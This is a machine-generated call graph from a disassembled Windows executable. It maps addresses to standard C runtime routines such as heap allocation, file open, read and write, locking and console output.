___crtIsPackagedApp 6845->6846 6847 f2567d IsDebuggerPresent 6846->6847 6848 f255cd LoadLibraryExW 6846->6848 6851 f256a2 6847->6851 6852 f25687 6847->6852 6849 f255e4 GetLastError 6848->6849 6850 f2560a GetProcAddress 6848->6850 6854 f255f3 LoadLibraryExW 6849->6854 6858 f2569a 6849->6858 6855 f2561e 7 API calls 6850->6855 6850->6858 6853 f256a7 DecodePointer 6851->6853 6856 f25695 6851->6856 6852->6856 6857 f2568e OutputDebugStringW 6852->6857 6853->6858 6854->6850 6854->6858 6859 f25666 GetProcAddress EncodePointer 6855->6859 6860 f2567a 6855->6860 6856->6858 6864 f256ce DecodePointer DecodePointer 6856->6864 6868 f256e6 6856->6868 6857->6856 6861 f25770 __crtLCMapStringA_stat 6 API calls 6858->6861 6859->6860 6860->6847 6865 f2576c 6861->6865 6862 f2570a DecodePointer 6862->6858 6863 f2571e DecodePointer 6863->6862 6866 
f25725 6863->6866 6864->6868 6865->6775 6866->6862 6869 f25736 DecodePointer 6866->6869 6868->6862 6868->6863 6869->6862 6871 f2577a IsProcessorFeaturePresent 6870->6871 6872 f25778 6870->6872 6874 f27ae6 6871->6874 6872->6750 6877 f27a95 IsDebuggerPresent 6874->6877 6878 f27aaa __call_reportfault 6877->6878 6883 f243cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6878->6883 6880 f27ab2 __call_reportfault 6884 f243b7 GetCurrentProcess TerminateProcess 6880->6884 6882 f27acf 6882->6750 6883->6880 6884->6882 6886 f2179f ExitProcess 6885->6886 6887 f2178d GetProcAddress 6885->6887 6887->6886 6889 f211c6 6888->6889 6897 f21157 6888->6897 6890 f21741 _malloc DecodePointer 6889->6890 6891 f211cc 6890->6891 6893 f21cc3 _memcpy_s 57 API calls 6891->6893 6892 f21a75 __FF_MSGBANNER 57 API calls 6898 f21162 6892->6898 6904 f211be 6893->6904 6894 f2118a RtlAllocateHeap 6894->6897 6894->6904 6895 f21ad2 __NMSG_WRITE 57 API calls 6895->6898 6896 f211b2 6900 f21cc3 _memcpy_s 57 API calls 6896->6900 6897->6894 6897->6896 6897->6898 6899 f21741 _malloc DecodePointer 6897->6899 6902 f211b0 6897->6902 6898->6892 6898->6895 6898->6897 6901 f217a8 _fast_error_exit 3 API calls 6898->6901 6899->6897 6900->6902 6901->6898 6903 f21cc3 _memcpy_s 57 API calls 6902->6903 6903->6904 6904->6780 6905->6784 6906->6787 6907->6709 6908->6712 6912 f24599 LeaveCriticalSection 6909->6912 6911 f23b5a 6911->6542 6912->6911 6914 f24945 EncodePointer 6913->6914 6914->6914 6915 f2495f 6914->6915 6915->6581 6919 f24720 6916->6919 6918 f24827 6918->6583 6920 f2472c __wsopen_helper 6919->6920 6927 f21920 6920->6927 6926 f24753 __wsopen_helper 6926->6918 6928 f2442f __lock 58 API calls 6927->6928 6929 f21927 6928->6929 6930 f24764 DecodePointer DecodePointer 6929->6930 6931 f24741 6930->6931 6932 f24791 6930->6932 6941 f2475e 6931->6941 6932->6931 6944 f27421 6932->6944 6934 f247f4 EncodePointer EncodePointer 6934->6931 6935 f247a3 6935->6934 6936 f247c8 6935->6936 6951 f248f8 6935->6951 6936->6931 
6938 f248f8 __realloc_crt 61 API calls 6936->6938 6940 f247e2 EncodePointer 6936->6940 6939 f247dc 6938->6939 6939->6931 6939->6940 6940->6934 6978 f21929 6941->6978 6945 f2742a 6944->6945 6946 f2743f HeapSize 6944->6946 6947 f21cc3 _memcpy_s 58 API calls 6945->6947 6946->6935 6948 f2742f 6947->6948 6949 f21e89 _memcpy_s 9 API calls 6948->6949 6950 f2743a 6949->6950 6950->6935 6953 f248ff 6951->6953 6954 f2493c 6953->6954 6956 f27452 6953->6956 6977 f243a9 Sleep 6953->6977 6954->6936 6957 f27466 6956->6957 6958 f2745b 6956->6958 6959 f2746e 6957->6959 6966 f2747b 6957->6966 6960 f2114b _malloc 58 API calls 6958->6960 6961 f24831 _free 58 API calls 6959->6961 6962 f27463 6960->6962 6976 f27476 __dosmaperr 6961->6976 6962->6953 6963 f274b3 6965 f21741 _malloc DecodePointer 6963->6965 6964 f27483 HeapReAlloc 6964->6966 6964->6976 6967 f274b9 6965->6967 6966->6963 6966->6964 6968 f274e3 6966->6968 6970 f21741 _malloc DecodePointer 6966->6970 6973 f274cb 6966->6973 6969 f21cc3 _memcpy_s 58 API calls 6967->6969 6971 f21cc3 _memcpy_s 58 API calls 6968->6971 6969->6976 6970->6966 6972 f274e8 GetLastError 6971->6972 6972->6976 6974 f21cc3 _memcpy_s 58 API calls 6973->6974 6975 f274d0 GetLastError 6974->6975 6975->6976 6976->6953 6977->6953 6981 f24599 LeaveCriticalSection 6978->6981 6980 f21930 6980->6926 6981->6980 6988 f211f2 6982->6988 6984 f21025 VirtualAlloc 6985 f21481 6984->6985 7504 f2149c 6985->7504 6987 f21497 6987->6591 6991 f211fe __wsopen_helper 6988->6991 6989 f21211 6990 f21cc3 _memcpy_s 58 API calls 6989->6990 6992 f21216 6990->6992 6991->6989 6993 f21242 6991->6993 6994 f21e89 _memcpy_s 9 API calls 6992->6994 7007 f22034 6993->7007 7004 f21221 __wsopen_helper @_EH4_CallFilterFunc@8 6994->7004 6996 f21247 6997 f21250 6996->6997 6998 f2125d 6996->6998 6999 f21cc3 _memcpy_s 58 API calls 6997->6999 7000 f21287 6998->7000 7001 f21267 6998->7001 6999->7004 7022 f22153 7000->7022 7002 f21cc3 _memcpy_s 58 API calls 7001->7002 7002->7004 7004->6984 7008 f22040 
__wsopen_helper 7007->7008 7009 f2442f __lock 58 API calls 7008->7009 7010 f2204e 7009->7010 7011 f220c9 7010->7011 7017 f244b7 __mtinitlocknum 58 API calls 7010->7017 7020 f220c2 7010->7020 7043 f21f9d 7010->7043 7048 f22007 7010->7048 7012 f248b1 __malloc_crt 58 API calls 7011->7012 7014 f220d0 7012->7014 7016 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7014->7016 7014->7020 7015 f2213f __wsopen_helper 7015->6996 7019 f220f6 EnterCriticalSection 7016->7019 7017->7010 7019->7020 7040 f2214a 7020->7040 7031 f22173 __wopenfile 7022->7031 7023 f2218d 7024 f21cc3 _memcpy_s 58 API calls 7023->7024 7025 f22192 7024->7025 7027 f21e89 _memcpy_s 9 API calls 7025->7027 7026 f22348 7026->7023 7029 f223ab 7026->7029 7028 f21292 7027->7028 7037 f212b4 7028->7037 7055 f2625f 7029->7055 7031->7023 7031->7026 7058 f262b3 7031->7058 7034 f262b3 __wcsnicmp 60 API calls 7035 f22360 7034->7035 7035->7026 7036 f262b3 __wcsnicmp 60 API calls 7035->7036 7036->7026 7497 f21fcd 7037->7497 7039 f212ba 7039->7004 7053 f24599 LeaveCriticalSection 7040->7053 7042 f22151 7042->7015 7044 f21fa8 7043->7044 7045 f21fbe EnterCriticalSection 7043->7045 7046 f2442f __lock 58 API calls 7044->7046 7045->7010 7047 f21fb1 7046->7047 7047->7010 7049 f22015 7048->7049 7050 f22028 LeaveCriticalSection 7048->7050 7054 f24599 LeaveCriticalSection 7049->7054 7050->7010 7052 f22025 7052->7010 7053->7042 7054->7052 7066 f25a43 7055->7066 7057 f26278 7057->7028 7059 f26351 7058->7059 7061 f262c5 7058->7061 7409 f26369 7059->7409 7062 f21cc3 _memcpy_s 58 API calls 7061->7062 7065 f22341 7061->7065 7063 f262de 7062->7063 7064 f21e89 _memcpy_s 9 API calls 7063->7064 7064->7065 7065->7026 7065->7034 7069 f25a4f __wsopen_helper 7066->7069 7067 f25a65 7068 f21cc3 _memcpy_s 58 API calls 7067->7068 7070 f25a6a 7068->7070 7069->7067 7071 f25a9b 7069->7071 7073 f21e89 _memcpy_s 9 API calls 7070->7073 7077 f25b0c 7071->7077 7076 f25a74 __wsopen_helper 7073->7076 7074 f25ab7 7151 f25ae0 7074->7151 
7076->7057 7078 f25b2c 7077->7078 7155 f28a18 7078->7155 7080 f25c7f 7081 f21e99 __invoke_watson 8 API calls 7080->7081 7082 f2625e 7081->7082 7084 f25a43 __wsopen_helper 103 API calls 7082->7084 7083 f25b48 7083->7080 7085 f25b82 7083->7085 7091 f25ba5 7083->7091 7086 f26278 7084->7086 7186 f21c8f 7085->7186 7086->7074 7089 f21cc3 _memcpy_s 58 API calls 7090 f25b94 7089->7090 7093 f21e89 _memcpy_s 9 API calls 7090->7093 7092 f25c63 7091->7092 7100 f25c41 7091->7100 7094 f21c8f __commit 58 API calls 7092->7094 7095 f25b9e 7093->7095 7096 f25c68 7094->7096 7095->7074 7097 f21cc3 _memcpy_s 58 API calls 7096->7097 7098 f25c75 7097->7098 7099 f21e89 _memcpy_s 9 API calls 7098->7099 7099->7080 7162 f26d16 7100->7162 7102 f25d0f 7103 f25d19 7102->7103 7104 f25d3c 7102->7104 7106 f21c8f __commit 58 API calls 7103->7106 7180 f259bb 7104->7180 7107 f25d1e 7106->7107 7109 f21cc3 _memcpy_s 58 API calls 7107->7109 7108 f25ddc GetFileType 7110 f25de7 GetLastError 7108->7110 7111 f25e29 7108->7111 7113 f25d28 7109->7113 7114 f21ca2 __dosmaperr 58 API calls 7110->7114 7194 f26fac 7111->7194 7112 f25daa GetLastError 7189 f21ca2 7112->7189 7117 f21cc3 _memcpy_s 58 API calls 7113->7117 7118 f25e0e CloseHandle 7114->7118 7117->7095 7120 f25dcf 7118->7120 7121 f25e1c 7118->7121 7119 f259bb ___createFile 3 API calls 7122 f25d9f 7119->7122 7125 f21cc3 _memcpy_s 58 API calls 7120->7125 7124 f21cc3 _memcpy_s 58 API calls 7121->7124 7122->7108 7122->7112 7126 f25e21 7124->7126 7125->7080 7126->7120 7129 f26002 7129->7080 7131 f261d5 CloseHandle 7129->7131 7132 f259bb ___createFile 3 API calls 7131->7132 7134 f261fc 7132->7134 7133 f25ec8 7133->7129 7140 f22a2a 70 API calls __read_nolock 7133->7140 7143 f27054 60 API calls __lseeki64_nolock 7133->7143 7145 f2607f 7133->7145 7148 f25ed0 7133->7148 7258 f27d99 7133->7258 7136 f26204 GetLastError 7134->7136 7150 f2608c 7134->7150 7135 f21c8f __commit 58 API calls 7135->7133 7137 f21ca2 __dosmaperr 58 API calls 7136->7137 7138 f26210 7137->7138 
7286 f26ebf 7138->7286 7140->7133 7143->7133 7146 f2897e __close_nolock 61 API calls 7145->7146 7147 f26086 7146->7147 7149 f21cc3 _memcpy_s 58 API calls 7147->7149 7148->7133 7212 f2897e 7148->7212 7227 f286ed 7148->7227 7149->7150 7150->7080 7152 f25ae6 7151->7152 7154 f25b0a 7151->7154 7408 f2702e LeaveCriticalSection 7152->7408 7154->7076 7156 f28a22 7155->7156 7157 f28a37 7155->7157 7158 f21cc3 _memcpy_s 58 API calls 7156->7158 7157->7083 7159 f28a27 7158->7159 7160 f21e89 _memcpy_s 9 API calls 7159->7160 7161 f28a32 7160->7161 7161->7083 7163 f26d22 __wsopen_helper 7162->7163 7164 f244b7 __mtinitlocknum 58 API calls 7163->7164 7165 f26d33 7164->7165 7166 f2442f __lock 58 API calls 7165->7166 7167 f26d38 __wsopen_helper 7165->7167 7176 f26d46 7166->7176 7167->7102 7168 f26e94 7307 f26eb6 7168->7307 7170 f26e26 7171 f24869 __calloc_crt 58 API calls 7170->7171 7175 f26e2f 7171->7175 7172 f26dc6 EnterCriticalSection 7174 f26dd6 LeaveCriticalSection 7172->7174 7172->7176 7173 f2442f __lock 58 API calls 7173->7176 7174->7176 7175->7168 7298 f26c88 7175->7298 7176->7168 7176->7170 7176->7172 7176->7173 7178 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7176->7178 7295 f26dee 7176->7295 7178->7176 7181 f259c6 ___crtIsPackagedApp 7180->7181 7182 f25a21 CreateFileW 7181->7182 7183 f259ca GetModuleHandleW GetProcAddress 7181->7183 7184 f25a3f 7182->7184 7185 f259e7 7183->7185 7184->7108 7184->7112 7184->7119 7185->7184 7187 f236f3 __getptd_noexit 58 API calls 7186->7187 7188 f21c94 7187->7188 7188->7089 7190 f21c8f __commit 58 API calls 7189->7190 7191 f21cab __dosmaperr 7190->7191 7192 f21cc3 _memcpy_s 58 API calls 7191->7192 7193 f21cbe 7192->7193 7193->7120 7195 f27014 7194->7195 7197 f26fb8 7194->7197 7196 f21cc3 _memcpy_s 58 API calls 7195->7196 7198 f27019 7196->7198 7197->7195 7202 f26fda 7197->7202 7199 f21c8f __commit 58 API calls 7198->7199 7200 f25e47 7199->7200 7200->7129 7200->7133 7203 f27054 7200->7203 7201 f26fff SetStdHandle 7201->7200 
7202->7200 7202->7201 7315 f26f45 7203->7315 7205 f27064 7206 f2706c 7205->7206 7207 f2707d SetFilePointerEx 7205->7207 7208 f21cc3 _memcpy_s 58 API calls 7206->7208 7209 f27095 GetLastError 7207->7209 7210 f25eb1 7207->7210 7208->7210 7211 f21ca2 __dosmaperr 58 API calls 7209->7211 7210->7133 7210->7135 7211->7210 7213 f26f45 __commit 58 API calls 7212->7213 7216 f2898c 7213->7216 7214 f289e2 7215 f26ebf __free_osfhnd 59 API calls 7214->7215 7221 f289ea 7215->7221 7216->7214 7218 f26f45 __commit 58 API calls 7216->7218 7226 f289c0 7216->7226 7217 f26f45 __commit 58 API calls 7219 f289cc CloseHandle 7217->7219 7222 f289b7 7218->7222 7219->7214 7223 f289d8 GetLastError 7219->7223 7220 f28a0c 7220->7148 7221->7220 7224 f21ca2 __dosmaperr 58 API calls 7221->7224 7225 f26f45 __commit 58 API calls 7222->7225 7223->7214 7224->7220 7225->7226 7226->7214 7226->7217 7228 f27054 __lseeki64_nolock 60 API calls 7227->7228 7229 f2870a 7228->7229 7231 f27054 __lseeki64_nolock 60 API calls 7229->7231 7239 f2876f 7229->7239 7230 f21cc3 _memcpy_s 58 API calls 7241 f2877a 7230->7241 7232 f28726 7231->7232 7233 f2874f GetProcessHeap HeapAlloc 7232->7233 7234 f2880e 7232->7234 7232->7239 7236 f2876a 7233->7236 7247 f28783 __setmode_nolock 7233->7247 7235 f28874 7234->7235 7240 f27054 __lseeki64_nolock 60 API calls 7234->7240 7237 f27054 __lseeki64_nolock 60 API calls 7235->7237 7235->7239 7238 f21cc3 _memcpy_s 58 API calls 7236->7238 7237->7239 7238->7239 7239->7230 7239->7241 7242 f28826 7240->7242 7241->7148 7242->7239 7243 f26f45 __commit 58 API calls 7242->7243 7244 f2883a SetEndOfFile 7243->7244 7244->7235 7246 f2885a 7244->7246 7248 f21cc3 _memcpy_s 58 API calls 7246->7248 7250 f287d4 7247->7250 7252 f287e3 __setmode_nolock 7247->7252 7328 f27e88 7247->7328 7249 f2885f 7248->7249 7251 f21c8f __commit 58 API calls 7249->7251 7253 f21c8f __commit 58 API calls 7250->7253 7254 f2886a GetLastError 7251->7254 7256 f287f8 GetProcessHeap HeapFree 7252->7256 7255 f287d9 7253->7255 
7254->7235 7255->7252 7257 f21cc3 _memcpy_s 58 API calls 7255->7257 7256->7235 7257->7252 7259 f27da5 __wsopen_helper 7258->7259 7260 f27db2 7259->7260 7261 f27dc9 7259->7261 7262 f21c8f __commit 58 API calls 7260->7262 7263 f27e68 7261->7263 7265 f27ddd 7261->7265 7264 f27db7 7262->7264 7266 f21c8f __commit 58 API calls 7263->7266 7268 f21cc3 _memcpy_s 58 API calls 7264->7268 7269 f27e05 7265->7269 7270 f27dfb 7265->7270 7267 f27e00 7266->7267 7273 f21cc3 _memcpy_s 58 API calls 7267->7273 7281 f27dbe __wsopen_helper 7268->7281 7271 f26c88 ___lock_fhandle 59 API calls 7269->7271 7272 f21c8f __commit 58 API calls 7270->7272 7274 f27e0b 7271->7274 7272->7267 7275 f27e74 7273->7275 7276 f27e31 7274->7276 7277 f27e1e 7274->7277 7278 f21e89 _memcpy_s 9 API calls 7275->7278 7280 f21cc3 _memcpy_s 58 API calls 7276->7280 7279 f27e88 __write_nolock 76 API calls 7277->7279 7278->7281 7282 f27e2a 7279->7282 7283 f27e36 7280->7283 7281->7133 7404 f27e60 7282->7404 7284 f21c8f __commit 58 API calls 7283->7284 7284->7282 7287 f26f2b 7286->7287 7288 f26ecb 7286->7288 7289 f21cc3 _memcpy_s 58 API calls 7287->7289 7288->7287 7293 f26ef4 7288->7293 7290 f26f30 7289->7290 7291 f21c8f __commit 58 API calls 7290->7291 7292 f26f1c 7291->7292 7292->7150 7293->7292 7294 f26f16 SetStdHandle 7293->7294 7294->7292 7310 f24599 LeaveCriticalSection 7295->7310 7297 f26df5 7297->7176 7299 f26c94 __wsopen_helper 7298->7299 7300 f26ce3 EnterCriticalSection 7299->7300 7302 f2442f __lock 58 API calls 7299->7302 7301 f26d09 __wsopen_helper 7300->7301 7301->7168 7303 f26cb9 7302->7303 7305 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7303->7305 7306 f26cd1 7303->7306 7305->7306 7311 f26d0d 7306->7311 7314 f24599 LeaveCriticalSection 7307->7314 7309 f26ebd 7309->7167 7310->7297 7312 f24599 _doexit LeaveCriticalSection 7311->7312 7313 f26d14 7312->7313 7313->7300 7314->7309 7316 f26f50 7315->7316 7318 f26f65 7315->7318 7317 f21c8f __commit 58 API calls 7316->7317 7319 f26f55 7317->7319 
7320 f21c8f __commit 58 API calls 7318->7320 7322 f26f8a 7318->7322 7321 f21cc3 _memcpy_s 58 API calls 7319->7321 7323 f26f94 7320->7323 7324 f26f5d 7321->7324 7322->7205 7325 f21cc3 _memcpy_s 58 API calls 7323->7325 7324->7205 7326 f26f9c 7325->7326 7327 f21e89 _memcpy_s 9 API calls 7326->7327 7327->7324 7329 f27e95 __write_nolock 7328->7329 7330 f27ef3 7329->7330 7331 f27ed4 7329->7331 7361 f27ec9 7329->7361 7334 f27f4b 7330->7334 7335 f27f2f 7330->7335 7333 f21c8f __commit 58 API calls 7331->7333 7332 f25770 __crtLCMapStringA_stat 6 API calls 7336 f286e9 7332->7336 7337 f27ed9 7333->7337 7339 f27f64 7334->7339 7343 f27054 __lseeki64_nolock 60 API calls 7334->7343 7338 f21c8f __commit 58 API calls 7335->7338 7336->7247 7340 f21cc3 _memcpy_s 58 API calls 7337->7340 7342 f27f34 7338->7342 7387 f26c34 7339->7387 7344 f27ee0 7340->7344 7347 f21cc3 _memcpy_s 58 API calls 7342->7347 7343->7339 7345 f21e89 _memcpy_s 9 API calls 7344->7345 7345->7361 7346 f27f72 7348 f282cb 7346->7348 7396 f236db 7346->7396 7349 f27f3b 7347->7349 7350 f282e9 7348->7350 7351 f2865e WriteFile 7348->7351 7352 f21e89 _memcpy_s 9 API calls 7349->7352 7354 f2840d 7350->7354 7363 f282ff 7350->7363 7355 f282be GetLastError 7351->7355 7360 f2828b 7351->7360 7352->7361 7367 f28418 7354->7367 7378 f28502 7354->7378 7355->7360 7357 f28697 7359 f21cc3 _memcpy_s 58 API calls 7357->7359 7357->7361 7358 f27fdd 7358->7348 7362 f27fed GetConsoleCP 7358->7362 7365 f286c5 7359->7365 7360->7357 7360->7361 7366 f283eb 7360->7366 7361->7332 7362->7357 7384 f2801c 7362->7384 7363->7357 7363->7360 7364 f2836e WriteFile 7363->7364 7364->7355 7364->7363 7369 f21c8f __commit 58 API calls 7365->7369 7370 f283f6 7366->7370 7371 f2868e 7366->7371 7367->7357 7367->7360 7368 f2847d WriteFile 7367->7368 7368->7355 7368->7367 7369->7361 7373 f21cc3 _memcpy_s 58 API calls 7370->7373 7374 f21ca2 __dosmaperr 58 API calls 7371->7374 7372 f28577 WideCharToMultiByte 7372->7355 7372->7378 7376 f283fb 7373->7376 7374->7361 7375 
f285c6 WriteFile 7375->7378 7379 f28619 GetLastError 7375->7379 7380 f21c8f __commit 58 API calls 7376->7380 7378->7357 7378->7360 7378->7372 7378->7375 7379->7378 7380->7361 7381 f292bb 60 API calls __write_nolock 7381->7384 7382 f28105 WideCharToMultiByte 7382->7360 7383 f28140 WriteFile 7382->7383 7383->7355 7383->7384 7384->7355 7384->7360 7384->7381 7384->7382 7385 f292d3 WriteConsoleW CreateFileW __putwch_nolock 7384->7385 7386 f2819a WriteFile 7384->7386 7401 f291b5 7384->7401 7385->7384 7386->7355 7386->7384 7388 f26c3f 7387->7388 7389 f26c4c 7387->7389 7390 f21cc3 _memcpy_s 58 API calls 7388->7390 7392 f26c58 7389->7392 7393 f21cc3 _memcpy_s 58 API calls 7389->7393 7391 f26c44 7390->7391 7391->7346 7392->7346 7394 f26c79 7393->7394 7395 f21e89 _memcpy_s 9 API calls 7394->7395 7395->7391 7397 f236f3 __getptd_noexit 58 API calls 7396->7397 7398 f236e1 7397->7398 7399 f236ee GetConsoleMode 7398->7399 7400 f217be __lock 58 API calls 7398->7400 7399->7348 7399->7358 7400->7399 7402 f2917b __isleadbyte_l 58 API calls 7401->7402 7403 f291c2 7402->7403 7403->7384 7407 f2702e LeaveCriticalSection 7404->7407 7406 f27e66 7406->7281 7407->7406 7408->7154 7410 f2637d 7409->7410 7419 f26394 7409->7419 7411 f26384 7410->7411 7412 f263a5 7410->7412 7413 f21cc3 _memcpy_s 58 API calls 7411->7413 7420 f24bfc 7412->7420 7415 f26389 7413->7415 7416 f21e89 _memcpy_s 9 API calls 7415->7416 7416->7419 7417 f28b0f 60 API calls __towlower_l 7418 f263b0 7417->7418 7418->7417 7418->7419 7419->7065 7421 f24c0d 7420->7421 7425 f24c5a 7420->7425 7422 f236db __setmbcp 58 API calls 7421->7422 7423 f24c13 7422->7423 7424 f24c3a 7423->7424 7428 f27356 7423->7428 7424->7425 7443 f24f1d 7424->7443 7425->7418 7429 f27362 __wsopen_helper 7428->7429 7430 f236db __setmbcp 58 API calls 7429->7430 7431 f2736b 7430->7431 7432 f2739a 7431->7432 7434 f2737e 7431->7434 7433 f2442f __lock 58 API calls 7432->7433 7435 f273a1 7433->7435 7436 f236db __setmbcp 58 API calls 7434->7436 7455 f273d6 7435->7455 
7437 f27383 7436->7437 7440 f27391 __wsopen_helper 7437->7440 7442 f217be __lock 58 API calls 7437->7442 7440->7424 7442->7440 7444 f24f29 __wsopen_helper 7443->7444 7445 f236db __setmbcp 58 API calls 7444->7445 7446 f24f33 7445->7446 7447 f24f45 7446->7447 7448 f2442f __lock 58 API calls 7446->7448 7449 f24f53 __wsopen_helper 7447->7449 7451 f217be __lock 58 API calls 7447->7451 7453 f24f63 7448->7453 7449->7425 7450 f24f90 7493 f24fba 7450->7493 7451->7449 7453->7450 7454 f24831 _free 58 API calls 7453->7454 7454->7450 7456 f273b5 7455->7456 7457 f273e1 ___addlocaleref ___removelocaleref 7455->7457 7459 f273cd 7456->7459 7457->7456 7462 f2715c 7457->7462 7492 f24599 LeaveCriticalSection 7459->7492 7461 f273d4 7461->7437 7463 f271d5 7462->7463 7465 f27171 7462->7465 7464 f24831 _free 58 API calls 7463->7464 7466 f27222 7463->7466 7467 f271f6 7464->7467 7465->7463 7468 f271a2 7465->7468 7476 f24831 _free 58 API calls 7465->7476 7469 f28d75 ___free_lc_time 58 API calls 7466->7469 7474 f2724b 7466->7474 7470 f24831 _free 58 API calls 7467->7470 7480 f24831 _free 58 API calls 7468->7480 7491 f271c0 7468->7491 7471 f27240 7469->7471 7473 f27209 7470->7473 7477 f24831 _free 58 API calls 7471->7477 7472 f272aa 7478 f24831 _free 58 API calls 7472->7478 7479 f24831 _free 58 API calls 7473->7479 7474->7472 7488 f24831 58 API calls _free 7474->7488 7475 f24831 _free 58 API calls 7481 f271ca 7475->7481 7482 f27197 7476->7482 7477->7474 7484 f272b0 7478->7484 7485 f27217 7479->7485 7486 f271b5 7480->7486 7487 f24831 _free 58 API calls 7481->7487 7483 f28c12 ___free_lconv_mon 58 API calls 7482->7483 7483->7468 7484->7456 7489 f24831 _free 58 API calls 7485->7489 7490 f28d0e ___free_lconv_num 58 API calls 7486->7490 7487->7463 7488->7474 7489->7466 7490->7491 7491->7475 7492->7461 7496 f24599 LeaveCriticalSection 7493->7496 7495 f24fc1 7495->7447 7496->7495 7498 f21ffb LeaveCriticalSection 7497->7498 7499 f21fdc 7497->7499 7498->7039 7499->7498 7500 f21fe3 7499->7500 7503 f24599 
LeaveCriticalSection 7500->7503 7502 f21ff8 7502->7039 7503->7502 7505 f214a8 __wsopen_helper 7504->7505 7506 f214eb 7505->7506 7507 f214be _memset 7505->7507 7508 f214e3 __wsopen_helper 7505->7508 7517 f21f5e 7506->7517 7511 f21cc3 _memcpy_s 58 API calls 7507->7511 7508->6987 7513 f214d8 7511->7513 7515 f21e89 _memcpy_s 9 API calls 7513->7515 7515->7508 7518 f21f90 EnterCriticalSection 7517->7518 7519 f21f6e 7517->7519 7522 f214f1 7518->7522 7519->7518 7520 f21f76 7519->7520 7521 f2442f __lock 58 API calls 7520->7521 7521->7522 7523 f212bc 7522->7523 7527 f212d7 _memset 7523->7527 7529 f212f2 7523->7529 7524 f212e2 7525 f21cc3 _memcpy_s 58 API calls 7524->7525 7526 f212e7 7525->7526 7528 f21e89 _memcpy_s 9 API calls 7526->7528 7527->7524 7527->7529 7534 f21332 7527->7534 7528->7529 7537 f21525 7529->7537 7531 f21443 _memset 7535 f21cc3 _memcpy_s 58 API calls 7531->7535 7534->7529 7534->7531 7540 f22873 7534->7540 7547 f22a2a 7534->7547 7615 f22752 7534->7615 7635 f22897 7534->7635 7535->7526 7538 f21fcd __wfsopen 2 API calls 7537->7538 7539 f2152b 7538->7539 7539->7508 7541 f22892 7540->7541 7542 f2287d 7540->7542 7541->7534 7543 f21cc3 _memcpy_s 58 API calls 7542->7543 7544 f22882 7543->7544 7545 f21e89 _memcpy_s 9 API calls 7544->7545 7546 f2288d 7545->7546 7546->7534 7548 f22a62 7547->7548 7549 f22a4b 7547->7549 7551 f2319a 7548->7551 7556 f22a9c 7548->7556 7550 f21c8f __commit 58 API calls 7549->7550 7553 f22a50 7550->7553 7552 f21c8f __commit 58 API calls 7551->7552 7554 f2319f 7552->7554 7555 f21cc3 _memcpy_s 58 API calls 7553->7555 7558 f21cc3 _memcpy_s 58 API calls 7554->7558 7595 f22a57 7555->7595 7557 f22aa4 7556->7557 7564 f22abb 7556->7564 7559 f21c8f __commit 58 API calls 7557->7559 7560 f22ab0 7558->7560 7561 f22aa9 7559->7561 7562 f21e89 _memcpy_s 9 API calls 7560->7562 7565 f21cc3 _memcpy_s 58 API calls 7561->7565 7562->7595 7563 f22ad0 7566 f21c8f __commit 58 API calls 7563->7566 7564->7563 7567 f22aea 7564->7567 7568 f22b08 7564->7568 7564->7595 
7565->7560 7566->7561 7567->7563 7570 f22af5 7567->7570 7569 f248b1 __malloc_crt 58 API calls 7568->7569 7571 f22b18 7569->7571 7572 f26c34 __read_nolock 58 API calls 7570->7572 7573 f22b20 7571->7573 7574 f22b3b 7571->7574 7575 f22c09 7572->7575 7576 f21cc3 _memcpy_s 58 API calls 7573->7576 7578 f27054 __lseeki64_nolock 60 API calls 7574->7578 7577 f22c82 ReadFile 7575->7577 7582 f22c1f GetConsoleMode 7575->7582 7579 f22b25 7576->7579 7580 f23162 GetLastError 7577->7580 7581 f22ca4 7577->7581 7578->7570 7583 f21c8f __commit 58 API calls 7579->7583 7584 f22c62 7580->7584 7585 f2316f 7580->7585 7581->7580 7589 f22c74 7581->7589 7586 f22c33 7582->7586 7587 f22c7f 7582->7587 7583->7595 7592 f21ca2 __dosmaperr 58 API calls 7584->7592 7597 f22c68 7584->7597 7588 f21cc3 _memcpy_s 58 API calls 7585->7588 7586->7587 7590 f22c39 ReadConsoleW 7586->7590 7587->7577 7593 f23174 7588->7593 7589->7597 7598 f22cd9 7589->7598 7599 f22f46 7589->7599 7590->7589 7591 f22c5c GetLastError 7590->7591 7591->7584 7592->7597 7594 f21c8f __commit 58 API calls 7593->7594 7594->7597 7595->7534 7596 f24831 _free 58 API calls 7596->7595 7597->7595 7597->7596 7601 f22d45 ReadFile 7598->7601 7607 f22dc6 7598->7607 7599->7597 7605 f2304c ReadFile 7599->7605 7602 f22d66 GetLastError 7601->7602 7609 f22d70 7601->7609 7602->7609 7603 f22e83 7611 f27054 __lseeki64_nolock 60 API calls 7603->7611 7613 f22e33 MultiByteToWideChar 7603->7613 7604 f22e73 7608 f21cc3 _memcpy_s 58 API calls 7604->7608 7606 f2306f GetLastError 7605->7606 7610 f2307d 7605->7610 7606->7610 7607->7597 7607->7603 7607->7604 7607->7613 7608->7597 7609->7598 7612 f27054 __lseeki64_nolock 60 API calls 7609->7612 7610->7599 7614 f27054 __lseeki64_nolock 60 API calls 7610->7614 7611->7613 7612->7609 7613->7591 7613->7597 7614->7610 7616 f2275d 7615->7616 7620 f22772 7615->7620 7617 f21cc3 _memcpy_s 58 API calls 7616->7617 7618 f22762 7617->7618 7619 f21e89 _memcpy_s 9 API calls 7618->7619 7626 f2276d 7619->7626 7621 f227a7 7620->7621 
7620->7626 7682 f265a7 7620->7682 7623 f22873 __filbuf 58 API calls 7621->7623 7624 f227bb 7623->7624 7649 f22916 7624->7649 7626->7534 7627 f227c2 7627->7626 7628 f22873 __filbuf 58 API calls 7627->7628 7629 f227e5 7628->7629 7629->7626 7630 f22873 __filbuf 58 API calls 7629->7630 7631 f227f1 7630->7631 7631->7626 7632 f22873 __filbuf 58 API calls 7631->7632 7633 f227fe 7632->7633 7634 f22873 __filbuf 58 API calls 7633->7634 7634->7626 7636 f228a6 7635->7636 7645 f228a2 _memmove 7635->7645 7637 f228ad 7636->7637 7640 f228c0 _memset 7636->7640 7638 f21cc3 _memcpy_s 58 API calls 7637->7638 7639 f228b2 7638->7639 7641 f21e89 _memcpy_s 9 API calls 7639->7641 7642 f228f7 7640->7642 7643 f228ee 7640->7643 7640->7645 7641->7645 7642->7645 7647 f21cc3 _memcpy_s 58 API calls 7642->7647 7644 f21cc3 _memcpy_s 58 API calls 7643->7644 7646 f228f3 7644->7646 7645->7534 7648 f21e89 _memcpy_s 9 API calls 